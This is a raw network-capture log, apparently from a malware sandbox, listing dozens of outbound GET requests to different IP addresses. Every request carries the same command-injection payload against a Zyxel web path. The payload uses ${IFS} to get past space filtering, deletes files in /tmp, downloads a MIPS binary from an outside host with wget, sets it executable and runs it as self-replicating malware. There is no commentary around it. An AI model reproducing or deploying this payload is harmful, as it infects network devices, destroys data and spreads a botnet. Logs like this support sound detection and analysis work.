                                        Mar 31, 2024 09:20:53.532335997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2718192.168.2.234652459.64.8.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.532401085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2719192.168.2.235971669.110.115.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.532480001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2720192.168.2.2343760154.12.116.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.532536030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2721192.168.2.2357798174.97.144.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.532612085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2722192.168.2.2334918142.203.71.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.532681942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2723192.168.2.2348706125.237.121.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.532746077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2724192.168.2.234478872.111.210.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.532814026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2725192.168.2.235941693.102.188.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.532893896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2726192.168.2.2344540209.207.162.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.532948971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2727192.168.2.2344814165.63.153.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533006907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2728192.168.2.235508678.55.29.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533072948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2729192.168.2.234637831.182.10.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533128977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2730192.168.2.233419035.129.76.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533207893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2731192.168.2.235675250.53.240.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533278942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2732192.168.2.2351788169.74.122.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533344984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2733192.168.2.2334046103.218.224.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533407927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2734192.168.2.235658413.146.113.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533483982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2735192.168.2.233650681.11.91.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533566952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2736192.168.2.2357762140.114.2.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533633947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2737192.168.2.2360958116.254.164.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533689022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2738192.168.2.235972054.28.55.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533772945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2739192.168.2.23367508.119.93.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533834934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2740192.168.2.234057653.50.248.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533915043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2741192.168.2.234974848.118.49.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.533978939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2742192.168.2.2336096211.202.193.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534041882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2743192.168.2.235789876.100.236.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534125090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2744192.168.2.2351546190.146.248.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534179926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2745192.168.2.234935299.143.25.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534254074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2746192.168.2.2333670217.176.81.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534295082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2747192.168.2.2336206191.162.42.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534359932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2748192.168.2.2343468157.232.99.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534446955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2749192.168.2.234835298.236.25.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534485102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2750192.168.2.2349364167.126.93.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534554005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2751192.168.2.2350986109.151.218.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534642935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2752192.168.2.2347994219.117.252.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534696102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2753192.168.2.2341824156.1.228.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534749031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2754192.168.2.234676239.149.105.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534827948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2755192.168.2.2338304132.165.187.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534873009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2756192.168.2.2334760212.39.13.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534928083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2757192.168.2.2333332106.171.204.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.534991980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2758192.168.2.2339594123.63.58.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535083055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2759192.168.2.234720657.36.179.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535140991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2760192.168.2.234297472.177.51.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535224915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2761192.168.2.2335982137.102.154.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535280943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2762192.168.2.2359822172.206.5.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535327911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2763192.168.2.23439122.38.94.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535399914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2764192.168.2.2344742167.76.16.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535489082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2765192.168.2.2337088163.201.47.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535552025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2766192.168.2.2349778118.230.229.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535623074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2767192.168.2.234088069.182.84.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535686970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2768192.168.2.2347524202.83.27.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535761118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2769192.168.2.2349530154.64.233.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535801888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2770192.168.2.2350078159.194.197.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535871983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2771192.168.2.235748249.213.116.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.535952091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2772192.168.2.2345644196.180.175.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536020041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2773192.168.2.2339294144.82.93.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536094904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2774192.168.2.2350444145.143.62.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536137104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2775192.168.2.234246288.56.4.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536197901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2776192.168.2.2357804144.57.111.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536309004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2777192.168.2.234629076.156.77.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536375999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2778192.168.2.233332012.52.71.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536437035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2779192.168.2.2351142136.46.218.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536493063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2780192.168.2.233875657.171.249.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536566973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2781192.168.2.233818890.232.54.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536664009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2782192.168.2.233459268.128.0.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536700010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2783192.168.2.235549880.160.7.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536762953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2784192.168.2.233761874.159.99.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536825895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2785192.168.2.2353540148.149.248.132443
                                        TimestampBytes transferredDirectionData
